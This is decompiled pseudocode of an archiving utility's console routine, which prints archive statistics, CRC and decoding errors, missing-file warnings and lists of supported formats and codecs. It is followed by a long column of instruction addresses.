											if(__eflags != 0) {
												_t598 = L00407DED(E00407CD5(_t829, "Folders: "), __eflags, _t569,  *(_t1079 - 0x90)); // executed
												L00407CC0(_t598, 0x407ccd);
												_t569 =  *(_t1079 - 0x94);
											}
											__eflags =  *((intOrPtr*)(_t1079 - 0x8c)) - 1;
											if(__eflags != 0) {
												L131:
												_t571 = L00407DED(E00407CD5(_t829, "Files: "), __eflags,  *((intOrPtr*)(_t1079 - 0x8c)),  *(_t1079 - 0x88)); // executed
												L00407CC0(_t571, 0x407ccd);
											} else {
												__eflags =  *(_t1079 - 0x88);
												if(__eflags != 0) {
													goto L131;
												} else {
													__eflags = _t569 |  *(_t1079 - 0x90);
													if(__eflags != 0) {
														goto L131;
													}
												}
											}
											_t574 = L00407DED(E00407CD5(_t829, "Size:       "), __eflags,  *((intOrPtr*)(_t1079 - 0xa4)),  *((intOrPtr*)(_t1079 - 0xa0))); // executed
											_t577 = L00407DED(E00407CD5(L00407CC0(_t574, 0x407ccd), "Compressed: "), __eflags,  *((intOrPtr*)(_t1079 - 0x9c)),  *((intOrPtr*)(_t1079 - 0x98))); // executed
											L00407CC0(_t577, 0x407ccd);
											__eflags =  *((char*)(_t1079 - 0x297));
											if( *((char*)(_t1079 - 0x297)) != 0) {
												L00407759( *((intOrPtr*)(_t1079 - 0x84)), _t1079 - 0x12c);
												L00407CC0(E00407CD5(E00407CD5(_t829, "CRC: "), _t1079 - 0x12c), 0x407ccd);
											}
											L00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
											 *(_t1079 - 4) = 0xf;
											E00405489(_t1079 - 0xf4);
											L00407A18( *((intOrPtr*)(_t1079 - 0xb8)));
											__eflags = _t1065;
											 *(_t1079 - 4) = 8;
											if(_t1065 != 0) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											goto L107;
										}
									}
									goto L110;
								} else {
									__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 6;
									if(__eflags == 0) {
										_push(_t1079 - 0x34);
										_push(_t1079 - 0x2a4);
										_push(_t1079 - 0x2a8);
										 *(_t1079 - 0x34) = _t1073;
										_push( *((intOrPtr*)(_t1079 - 0x298)));
										 *(_t1079 - 0x30) = _t1073;
										_push( *((intOrPtr*)(_t1079 - 0x2d1)));
										_t918 = _t1065;
										_push( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2c0)))) + 0xc);
										_push(_t1079 - 0x270);
										_push(_t1079 - 0x284);
										_push( *((intOrPtr*)(_t1079 - 0x2d3)));
										_t614 = L0040279E(_t918, _t1079 - 0x60, __eflags);
										__eflags =  *(_t1079 - 0x30) - _t1073;
										if(__eflags > 0) {
											L151:
											L00407DED(E00407CD5(L00407CC0(0x490ab8, 0x407ccd), "Errors: "), __eflags,  *(_t1079 - 0x34),  *(_t1079 - 0x30));
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065 - _t1073;
											 *(_t1079 - 4) = 4;
											if(_t1065 != _t1073) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											_t471 = _t1079 - 4;
											 *_t471 =  *(_t1079 - 4) & 0x00000000;
											__eflags =  *_t471;
											E00405233(_t1079 - 0x2d8,  *_t471);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0x13;
											goto L154;
										} else {
											__eflags =  *(_t1079 - 0x34) - _t1073;
											if(__eflags <= 0) {
												__eflags = _t614 - _t1073;
												if(_t614 == _t1073) {
													goto L107;
												} else {
													 *(_t1079 - 0x14) = _t614;
													L0046B8F4(_t1079 - 0x14, 0x47d368);
													_t625 = _t918;
													__eflags = 0;
													 *((intOrPtr*)(_t625 + 4)) = 0;
													 *((intOrPtr*)(_t625 + 8)) = 0;
													 *((intOrPtr*)(_t625 + 0xc)) = 0;
													 *((intOrPtr*)(_t625 + 0x10)) =  *((intOrPtr*)(_t1082 + 4));
													 *_t625 = 0x47a670;
													return _t625;
												}
											} else {
												goto L151;
											}
										}
									} else {
										_t626 = L0040FE46(_t1079 - 0x2b8);
										__eflags = _t626;
										if(_t626 == 0) {
											E0040519B(_t829);
											goto L107;
										} else {
											__eflags =  *((char*)(_t1079 - 0x1c0));
											if( *((char*)(_t1079 - 0x1c0)) != 0) {
												__eflags =  *((intOrPtr*)(_t1079 - 0x1b8)) - _t1073;
												if( *((intOrPtr*)(_t1079 - 0x1b8)) == _t1073) {
													L00403593(_t1079 - 0x1bc,  *0x48aadc);
												}
											}
											L0040347F(_t1079 - 0x148);
											__eflags =  *((char*)(_t1079 - 0x2a8));
											 *(_t1079 - 4) = 0x14;
											 *((intOrPtr*)(_t1079 - 0x144)) = _t829;
											if( *((char*)(_t1079 - 0x2a8)) == 0) {
												L70:
												_t179 = _t1079 - 0xd;
												 *_t179 =  *(_t1079 - 0xd) & 0x00000000;
												__eflags =  *_t179;
											} else {
												__eflags =  *((intOrPtr*)(_t1079 - 0x2a0)) - _t1073;
												if( *((intOrPtr*)(_t1079 - 0x2a0)) == _t1073) {
													goto L70;
												} else {
													 *(_t1079 - 0xd) = 1;
												}
											}
											 *((char*)(_t1079 - 0x140)) =  *(_t1079 - 0xd);
											E00401E26(_t1079 - 0x13c, _t1079 - 0x2a4);
											E0040502A(_t1079 - 0x378);
											__eflags =  *((char*)(_t1079 - 0x2a8));
											 *((char*)(_t1079 - 0x340)) =  *((intOrPtr*)(_t1079 - 0x164));
											 *(_t1079 - 4) = 0x15;
											 *((char*)(_t1079 - 0x33e)) =  *(_t1079 - 0xd);
											if( *((char*)(_t1079 - 0x2a8)) == 0) {
												L74:
												_t194 = _t1079 - 0x330;
												 *_t194 =  *(_t1079 - 0x330) & 0x00000000;
												__eflags =  *_t194;
											} else {
												__eflags =  *((intOrPtr*)(_t1079 - 0x2a0)) - _t1073;
												if( *((intOrPtr*)(_t1079 - 0x2a0)) != _t1073) {
													goto L74;
												} else {
													 *(_t1079 - 0x330) = 1;
												}
											}
											E00401E26(_t1079 - 0x33c, _t1079 - 0x2a4);
											 *((char*)(_t1079 - 0x33f)) =  *((intOrPtr*)(_t1079 - 0x1a0));
											E00405172(_t1079 - 0x378, _t829);
											E00404BAF(_t1079 - 0x11c);
											_push(_t1079 - 0x2b4);
											_push(_t1079 - 0x60);
											_push(_t1065);
											 *(_t1079 - 4) = 0x16;
											_t642 = E00419B56(_t1079 - 0x248, _t1049);
											__eflags = _t642;
											if(_t642 == 0) {
												_t725 =  *0x48aad8; // 0x48aaf4
												 *(_t1079 - 0x14) = _t725;
												L0046B8F4(_t1079 - 0x14, 0x47d358);
											}
											_t1057 = _t1079 - 0x2cc;
											_push(_t1079 - 0x378);
											_push(_t1079 - 0x148);
											_push(_t1079 - 0x11c);
											_push(_t1079 - 0x248);
											_t647 = E00419FDE(_t1065, _t1079 - 0x2cc);
											 *(_t1079 - 0x18) =  *(_t1079 - 0x18) & 0x00000000;
											__eflags =  *(_t1079 - 0x2fc);
											 *(_t1079 - 0x14) = _t647;
											_t1077 = 0x407ccd;
											if( *(_t1079 - 0x2fc) > 0) {
												L00407CC0(_t829, 0x407ccd);
												L00407CC0(L00407CC0(E00407CD5(_t829, "WARNINGS for files:"), 0x407ccd), 0x407ccd);
												_t706 =  *(_t1079 - 0x2fc);
												_t1069 = 0;
												__eflags = _t706;
												 *(_t1079 - 0x1c) = _t706;
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(L00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2f8)) + _t1069 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2e4)) + _t1069 * 4));
														_t720 = E00404B09(_t1079 - 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2e4)) + _t1069 * 4)));
														_push(0x407ccd);
														 *(_t1079 - 4) = 0x17;
														L00407CC0(L00407CEC(_t829),  *_t720);
														 *(_t1079 - 4) = 0x16;
														L00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
														_t1069 = _t1069 + 1;
														__eflags = _t1069 -  *(_t1079 - 0x1c);
													} while (__eflags < 0);
												}
												L00407CC0(E00407CD5(_t829, "----------------"), _t1077);
												E00407CD5(L00407DC6(E00407CD5(_t829, "WARNING: Cannot find "), _t1057, __eflags,  *(_t1079 - 0x1c)), " file");
												_t1070 = 1;
												__eflags =  *(_t1079 - 0x1c) - _t1070;
												if( *(_t1079 - 0x1c) > _t1070) {
													E00407CD5(_t829, "s");
												}
												L00407CC0(_t829, _t1077);
												 *(_t1079 - 0x18) = _t1070;
												_t1065 =  *(_t1079 - 0x20);
											}
											__eflags =  *(_t1079 - 0x14);
											if( *(_t1079 - 0x14) != 0) {
												_t1065 = 0;
												 *((intOrPtr*)(_t1079 - 0x38)) = 0;
												 *(_t1079 - 0x34) = 0;
												 *(_t1079 - 0x30) = 0;
												E00401E9A(_t1079 - 0x38, 3);
												__eflags =  *(_t1079 - 0xfc);
												 *(_t1079 - 4) = 0x18;
												_t1077 = "\n";
												if(__eflags != 0) {
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t1079 - 0x100);
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												__eflags =  *((intOrPtr*)(_t1079 - 0x114)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t1079 - 0x118);
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												__eflags =  *((intOrPtr*)(_t1079 - 0x108)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t1079 - 0x10c);
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												_t1057 =  *((intOrPtr*)(_t1079 - 0x11c));
												__eflags =  *((intOrPtr*)(_t1079 - 0x11c)) - _t1065;
												if( *((intOrPtr*)(_t1079 - 0x11c)) != _t1065) {
													_t689 = E00404B09(_t1079 - 0x2c, _t1057);
													 *(_t1079 - 4) = 0x19;
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t689);
													 *(_t1079 - 4) = 0x18;
													L00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												__eflags =  *(_t1079 - 0x34) - _t1065;
												if( *(_t1079 - 0x34) != _t1065) {
													_push( *((intOrPtr*)(_t1079 - 0x38)));
													_push(L"\nError:\n");
													L00407CEC(L00407CEC(_t829));
												}
												L0046B8F4(_t1079 - 0x14, 0x47d368);
											}
											_t648 =  *(_t1079 - 0x324);
											__eflags = _t648;
											 *(_t1079 - 0x1c) = _t648;
											if(_t648 != 0) {
												L00407CC0(_t829, _t1077);
												L00407CC0(L00407CC0(E00407CD5(_t829, "WARNINGS for files:"), _t1077), _t1077);
												_t1067 = 0;
												__eflags =  *(_t1079 - 0x1c);
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(L00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x320)) + _t1067 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x30c)) + _t1067 * 4));
														_t676 = E00404B09(_t1079 - 0x128,  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x30c)) + _t1067 * 4)));
														_push(_t1077);
														 *(_t1079 - 4) = 0x1a;
														L00407CC0(L00407CEC(_t829),  *_t676);
														 *(_t1079 - 4) = 0x16;
														L00407A18( *((intOrPtr*)(_t1079 - 0x128)));
														_t1067 = _t1067 + 1;
														__eflags = _t1067 -  *(_t1079 - 0x1c);
													} while (__eflags < 0);
												}
												L00407CC0(E00407CD5(_t829, "----------------"), _t1077);
												E00407CD5(L00407DC6(E00407CD5(_t829, "WARNING: Cannot open "), _t1057, __eflags,  *(_t1079 - 0x1c)), " file");
												_t1068 = 1;
												__eflags =  *(_t1079 - 0x1c) - _t1068;
												if(__eflags > 0) {
													E00407CD5(_t829, "s");
												}
												L00407CC0(_t829, _t1077);
												 *(_t1079 - 0x18) = _t1068;
												_t1065 =  *(_t1079 - 0x20);
											} else {
												__eflags =  *(_t1079 - 0x2fc) - _t648;
												if(__eflags == 0) {
													L00407CC0(E00407CD5(_t829,  *0x48aacc), _t1077);
												}
											}
											 *(_t1079 - 4) = 0x15;
											E004054DE(_t1079 - 0x11c);
											 *(_t1079 - 4) = 0x14;
											E004050D8(_t1079 - 0x378, __eflags);
											L00407A18( *((intOrPtr*)(_t1079 - 0x13c)));
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065;
											 *(_t1079 - 4) = 4;
											if(_t1065 != 0) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
											E00405233(_t1079 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0x1b;
											E0040862D();
											 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
											E00408604(_t1079 - 0x4c);
											_t554 =  *(_t1079 - 0x18);
										}
										goto L110;
									}
								}
							} else {
								_t729 = E0040807A(L"CRC");
								_t133 = _t829 + 4; // 0x48de00
								_t996 =  *_t133;
								_t1049 =  *((intOrPtr*)(_t1079 - 0x160));
								_push( *((intOrPtr*)(_t1079 - 0x158)));
								__eflags = _t729 - _t1073;
								_push( *((intOrPtr*)(_t1079 - 0x15c)));
								if(__eflags != 0) {
									L55:
									_t730 = E004012BB(_t996, _t1049, __eflags);
									__eflags = _t730 - _t1073;
									if(_t730 == _t1073) {
										goto L107;
									} else {
										__eflags = _t730 - 1;
										if(_t730 != 1) {
											 *(_t1079 - 0x14) = _t730;
											L0046B8F4(_t1079 - 0x14, 0x47d368);
											goto L61;
										} else {
											E00407CD5(_t829, "\nDecoding Error\n");
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065 - _t1073;
											 *(_t1079 - 4) = 4;
											if(_t1065 != _t1073) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
											E00405233(_t1079 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0xc;
											L154:
											E0040862D();
											 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
											E00408604(_t1079 - 0x4c);
											_t554 = 2;
											goto L110;
										}
									}
								} else {
									_t739 = E00401679(_t996, _t1049, __eflags);
									__eflags = _t739 - _t1073;
									if(_t739 == _t1073) {
										L107:
										 *(_t1079 - 4) = 7;
										E00408604(_t1079 - 0x60);
										_t583 =  *(_t1079 - 0x20);
										 *(_t1079 - 4) = 4;
										__eflags = _t583;
										if(_t583 != 0) {
											 *((intOrPtr*)( *_t583 + 8))(_t583);
										}
										 *(_t1079 - 4) = 3;
										L00406E46(_t1079 - 0x7c, _t1065);
										 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
										E00405233(_t1079 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
										 *(_t1079 - 4) = 0x1c;
										E0040862D();
										 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
										E00408604(_t1079 - 0x4c);
										_t554 = 0;
										__eflags = 0;
										goto L110;
									} else {
										__eflags = _t739 - 1;
										if(__eflags != 0) {
											 *(_t1079 - 0x14) = _t739;
											L0046B8F4(_t1079 - 0x14, 0x47d368);
											goto L55;
										} else {
											E00407CD5(_t829, "\nCRC Error\n");
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065 - _t1073;
											 *(_t1079 - 4) = 4;
											if(_t1065 != _t1073) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											_t143 = _t1079 - 4;
											 *_t143 =  *(_t1079 - 4) & 0x00000000;
											__eflags =  *_t143;
											E00405233(_t1079 - 0x2d8,  *_t143);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0xb;
											_t1073 = 2;
											goto L53;
										}
									}
								}
							}
						} else {
							L00407CC0(E00407CD5(L00407CC0(_t829, 0x407ccd), "Formats:"), 0x407ccd);
							_t1071 =  *(_t1065 + 0x10);
							 *(_t1079 - 0x1c) =  *(_t1079 - 0x1c) & 0x00000000;
							__eflags =  *(_t1065 + 0x10);
							if( *(_t1065 + 0x10) > 0) {
								do {
									_t1071 =  *( *((intOrPtr*)( *(_t1079 - 0x20) + 0x14)) +  *(_t1079 - 0x1c) * 4);
									E00407CD5(_t829, "  ");
									_t764 = L00407DAD(_t829, 0x20);
									__eflags =  *_t1071;
									_t769 = L00407DAD(_t829, ((_t764 & 0xffffff00 |  *_t1071 == 0x00000000) - 0x00000001 & 0x00000023) + 0x20);
									__eflags =  *((char*)(_t1071 + 0x38));
									L00407DAD(_t829, ((_t769 & 0xffffff00 |  *((char*)(_t1071 + 0x38)) == 0x00000000) - 0x00000001 & 0x0000002b) + 0x20);
									E00407CD5(_t829, "  ");
									_t1059 = _t1071 + 0xc;
									E00405208(_t829, _t1071 + 0xc, 6);
									E00407CD5(_t829, "  ");
									 *((intOrPtr*)(_t1079 - 0x2c)) = 0;
									 *(_t1079 - 0x28) = 0;
									 *((intOrPtr*)(_t1079 - 0x24)) = 0;
									E00401E9A(_t1079 - 0x2c, 3);
									 *(_t1079 - 0x18) =  *(_t1079 - 0x18) & 0x00000000;
									__eflags =  *(_t1071 + 0x20);
									 *(_t1079 - 4) = 9;
									if(__eflags > 0) {
										do {
											 *(_t1079 - 0x30) =  *( *((intOrPtr*)(_t1071 + 0x24)) +  *(_t1079 - 0x18) * 4);
											E00405529(_t1079 - 0x2c, _t1059, __eflags,  *( *((intOrPtr*)(_t1071 + 0x24)) +  *(_t1079 - 0x18) * 4));
											__eflags =  *( *(_t1079 - 0x30) + 0x10);
											if(__eflags != 0) {
												L004035F2(_t1079 - 0x2c, _t1059, L" (");
												__eflags =  *(_t1079 - 0x30) + 0xc;
												E00405529(_t1079 - 0x2c, _t1059, __eflags,  *(_t1079 - 0x30) + 0xc);
												E004054FE(_t1079 - 0x2c, _t1059, __eflags, 0x29);
											}
											E004054FE(_t1079 - 0x2c, _t1059, __eflags, 0x20);
											 *(_t1079 - 0x18) =  *(_t1079 - 0x18) + 1;
											__eflags =  *(_t1079 - 0x18) -  *(_t1071 + 0x20);
										} while (__eflags < 0);
									}
									E00405208(_t829, _t1079 - 0x2c, 0xe);
									E00407CD5(_t829, "  ");
									 *(_t1079 - 0x18) =  *(_t1079 - 0x18) & 0x00000000;
									__eflags =  *(_t1071 + 0x30);
									if( *(_t1071 + 0x30) > 0) {
										do {
											_t786 =  *((intOrPtr*)( *((intOrPtr*)(_t1071 + 0x34)) +  *(_t1079 - 0x18)));
											__eflags = _t786 - 0x20;
											 *(_t1079 - 0x14) = _t786;
											if(_t786 <= 0x20) {
												L34:
												_t787 = _t786 >> 4;
												__eflags = _t787 - 0xa;
												_t788 = _t787 & 0x000000ff;
												if(_t787 >= 0xa) {
													_t789 = _t788 + 0x37;
													__eflags = _t788 + 0x37;
												} else {
													_t789 = _t788 + 0x30;
												}
												L00407DAD(_t829, _t789);
												_t792 =  *(_t1079 - 0x14) & 0x0000000f;
												__eflags = _t792 - 0xa;
												_t793 = _t792 & 0x000000ff;
												if(_t792 >= 0xa) {
													_t794 = _t793 + 0x37;
													__eflags = _t794;
												} else {
													_t794 = _t793 + 0x30;
												}
												_push(_t794);
											} else {
												__eflags = _t786 - 0x80;
												if(_t786 >= 0x80) {
													goto L34;
												} else {
													_push( *(_t1079 - 0x14));
												}
											}
											L00407DAD(_t829);
											L00407DAD(_t829, 0x20);
											 *(_t1079 - 0x18) =  *(_t1079 - 0x18) + 1;
											__eflags =  *(_t1079 - 0x18) -  *(_t1071 + 0x30);
										} while ( *(_t1079 - 0x18) <  *(_t1071 + 0x30));
									}
									L00407CC0(_t829, 0x407ccd);
									 *(_t1079 - 4) = 8;
									L00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
									 *(_t1079 - 0x1c) =  *(_t1079 - 0x1c) + 1;
									_t784 =  *(_t1079 - 0x20);
									__eflags =  *(_t1079 - 0x1c) -  *((intOrPtr*)(_t784 + 0x10));
								} while ( *(_t1079 - 0x1c) <  *((intOrPtr*)(_t784 + 0x10)));
							}
							L00407CC0(E00407CD5(L00407CC0(_t829, 0x407ccd), "Codecs:"), 0x407ccd);
							 *(_t1079 - 4) = 7;
							E00408604(_t1079 - 0x60);
							_t757 =  *(_t1079 - 0x20);
							 *(_t1079 - 4) = 4;
							__eflags = _t757;
							if(_t757 != 0) {
								 *((intOrPtr*)( *_t757 + 8))(_t757);
							}
							 *(_t1079 - 4) = 3;
							L00406E46(_t1079 - 0x7c, _t1071);
							 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
							E00405233(_t1079 - 0x2d8, __eflags);
							 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
							 *(_t1079 - 4) = 0xa;
							_t1073 = 0;
							goto L53;
						}
					} else {
						E004051E3(0x490ab8, 1);
						 *(_t1079 - 4) = 3;
						L00406E46(_t1079 - 0x7c, 0x47a420);
						 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
						E00405233(_t1079 - 0x2d8, __eflags);
						 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
						 *(_t1079 - 4) = 5;
						goto L53;
					}
				} else {
					E004051E3(0x490ab8, 1);
					 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
					 *(_t1079 - 4) = 2;
					L53:
					E0040862D();
					 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
					E00408604(_t1079 - 0x4c);
					_t554 = _t1073;
					L110:
					 *[fs:0x0] =  *((intOrPtr*)(_t1079 - 0xc));
					return _t554;
				}
			}




























































                                                                                  0x00403a75
                                                                                  0x00403a7a
                                                                                  0x00403a80
                                                                                  0x00403a83
                                                                                  0x00403a8c
                                                                                  0x00403a96
                                                                                  0x00403a99
                                                                                  0x00403a9b
                                                                                  0x00403aa8
                                                                                  0x00403aad
                                                                                  0x00403ab3
                                                                                  0x00403ab7
                                                                                  0x00403abc
                                                                                  0x00403ac3
                                                                                  0x00403acd
                                                                                  0x00403af0
                                                                                  0x00403afb
                                                                                  0x00403b03
                                                                                  0x00403b07
                                                                                  0x00403b15
                                                                                  0x00403b19
                                                                                  0x00403b1a
                                                                                  0x00403b1e
                                                                                  0x00403b23
                                                                                  0x00403b2a
                                                                                  0x00403b62
                                                                                  0x00403b69
                                                                                  0x00403b6b
                                                                                  0x00403b72
                                                                                  0x00403b72
                                                                                  0x00403b77
                                                                                  0x00403b7e
                                                                                  0x00403b83
                                                                                  0x00403b85
                                                                                  0x00403b85
                                                                                  0x00403b8a
                                                                                  0x00403b91
                                                                                  0x00403b97
                                                                                  0x00403b99
                                                                                  0x00403b99
                                                                                  0x00403b9d
                                                                                  0x00403b9d
                                                                                  0x00403bab
                                                                                  0x00403bac
                                                                                  0x00403bb1
                                                                                  0x00403bb3
                                                                                  0x00403bb9
                                                                                  0x00403bbc
                                                                                  0x00403bbe
                                                                                  0x00403bc2
                                                                                  0x00403bcf
                                                                                  0x00403bcf
                                                                                  0x00403bc4
                                                                                  0x00403bcb
                                                                                  0x00403bcb
                                                                                  0x00403bd1
                                                                                  0x00403bd3
                                                                                  0x00403bd6
                                                                                  0x00403bda
                                                                                  0x00403be0
                                                                                  0x00403be5
                                                                                  0x00403be5
                                                                                  0x00403bea
                                                                                  0x00403bee
                                                                                  0x00403bf3
                                                                                  0x00403bf5
                                                                                  0x00403bf7
                                                                                  0x00403c03
                                                                                  0x00403c03
                                                                                  0x00403c0e
                                                                                  0x00403c13
                                                                                  0x00403c16
                                                                                  0x00403c19
                                                                                  0x00403c1b
                                                                                  0x00403c1d
                                                                                  0x00403c37
                                                                                  0x00403c37
                                                                                  0x00403c41
                                                                                  0x00403c48
                                                                                  0x00403c1f
                                                                                  0x00403c1f
                                                                                  0x00403c26
                                                                                  0x00000000
                                                                                  0x00403c28
                                                                                  0x00403c2e
                                                                                  0x00403c33
                                                                                  0x00403c35
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403c35
                                                                                  0x00403c26
                                                                                  0x00403c1d
                                                                                  0x00403c4d
                                                                                  0x00403c52
                                                                                  0x00403c57
                                                                                  0x00403c63
                                                                                  0x00403c6a
                                                                                  0x00403c6b
                                                                                  0x00403c6f
                                                                                  0x00403c74
                                                                                  0x00403c76
                                                                                  0x00403c78
                                                                                  0x00403c82
                                                                                  0x00403c89
                                                                                  0x00403c89
                                                                                  0x00403c8e
                                                                                  0x00403c95
                                                                                  0x00403ecc
                                                                                  0x00403ed3
                                                                                  0x0040400d
                                                                                  0x0040400d
                                                                                  0x00404011
                                                                                  0x00404572
                                                                                  0x00404574
                                                                                  0x0040457a
                                                                                  0x0040457d
                                                                                  0x0040457f
                                                                                  0x00404583
                                                                                  0x00404590
                                                                                  0x00404590
                                                                                  0x00404585
                                                                                  0x0040458c
                                                                                  0x0040458c
                                                                                  0x00404592
                                                                                  0x00404594
                                                                                  0x00404598
                                                                                  0x0040459b
                                                                                  0x004045a0
                                                                                  0x004045a0
                                                                                  0x004045a3
                                                                                  0x004045ac
                                                                                  0x004045b6
                                                                                  0x004045b9
                                                                                  0x004045bd
                                                                                  0x004045ca
                                                                                  0x004045cd
                                                                                  0x004045d0
                                                                                  0x004045d3
                                                                                  0x004045d6
                                                                                  0x004045d9
                                                                                  0x004045dc
                                                                                  0x004045df
                                                                                  0x004045e2
                                                                                  0x004045f3
                                                                                  0x00404600
                                                                                  0x00404604
                                                                                  0x0040460a
                                                                                  0x00404615
                                                                                  0x0040461a
                                                                                  0x00404626
                                                                                  0x0040462a
                                                                                  0x00404630
                                                                                  0x00404636
                                                                                  0x0040463b
                                                                                  0x00404642
                                                                                  0x00404651
                                                                                  0x0040465d
                                                                                  0x0040466a
                                                                                  0x0040467b
                                                                                  0x00404687
                                                                                  0x0040468d
                                                                                  0x0040469e
                                                                                  0x0040469f
                                                                                  0x004046a7
                                                                                  0x004046ac
                                                                                  0x004046af
                                                                                  0x004046b2
                                                                                  0x004046c3
                                                                                  0x004046c9
                                                                                  0x004046d0
                                                                                  0x004046d1
                                                                                  0x004046db
                                                                                  0x004046dc
                                                                                  0x004046e3
                                                                                  0x004046e7
                                                                                  0x004046f1
                                                                                  0x004046f5
                                                                                  0x004046fa
                                                                                  0x004046fe
                                                                                  0x00404706
                                                                                  0x00404708
                                                                                  0x00404721
                                                                                  0x00404726
                                                                                  0x0040472a
                                                                                  0x0040472c
                                                                                  0x0040472c
                                                                                  0x0040472a
                                                                                  0x00404736
                                                                                  0x0040473b
                                                                                  0x0040473e
                                                                                  0x00404741
                                                                                  0x00404743
                                                                                  0x0040474a
                                                                                  0x00404762
                                                                                  0x00404745
                                                                                  0x00404745
                                                                                  0x00404748
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404748
                                                                                  0x0040476a
                                                                                  0x0040476d
                                                                                  0x004048d7
                                                                                  0x004048d7
                                                                                  0x004048db
                                                                                  0x004048e3
                                                                                  0x004048e6
                                                                                  0x004048eb
                                                                                  0x004048ee
                                                                                  0x004048f3
                                                                                  0x004048f5
                                                                                  0x0040490f
                                                                                  0x0040490f
                                                                                  0x00404914
                                                                                  0x00404917
                                                                                  0x0040491c
                                                                                  0x0040491e
                                                                                  0x00404938
                                                                                  0x00404938
                                                                                  0x004048dd
                                                                                  0x004048dd
                                                                                  0x004048e1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004048e1
                                                                                  0x0040493d
                                                                                  0x00404941
                                                                                  0x0040494b
                                                                                  0x00404952
                                                                                  0x00404952
                                                                                  0x0040495a
                                                                                  0x00404960
                                                                                  0x0040496a
                                                                                  0x00404975
                                                                                  0x0040497a
                                                                                  0x0040497d
                                                                                  0x00404981
                                                                                  0x00404986
                                                                                  0x00404986
                                                                                  0x0040498c
                                                                                  0x00404990
                                                                                  0x00404995
                                                                                  0x00404998
                                                                                  0x0040499c
                                                                                  0x0040499e
                                                                                  0x004049a3
                                                                                  0x004049a3
                                                                                  0x004049a9
                                                                                  0x004049ad
                                                                                  0x004049b2
                                                                                  0x004049bc
                                                                                  0x004049c1
                                                                                  0x004049c8
                                                                                  0x00000000
                                                                                  0x00404773
                                                                                  0x00404776
                                                                                  0x00404779
                                                                                  0x00000000
                                                                                  0x0040477f
                                                                                  0x0040477f
                                                                                  0x00404783
                                                                                  0x0040478d
                                                                                  0x00404794
                                                                                  0x00404794
                                                                                  0x00404799
                                                                                  0x004047a1
                                                                                  0x004047a7
                                                                                  0x004047bf
                                                                                  0x004047c6
                                                                                  0x004047cb
                                                                                  0x004047cb
                                                                                  0x004047d1
                                                                                  0x004047d8
                                                                                  0x004047eb
                                                                                  0x00404806
                                                                                  0x0040480d
                                                                                  0x004047da
                                                                                  0x004047da
                                                                                  0x004047e1
                                                                                  0x00000000
                                                                                  0x004047e3
                                                                                  0x004047e3
                                                                                  0x004047e9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004047e9
                                                                                  0x004047e1
                                                                                  0x0040483f
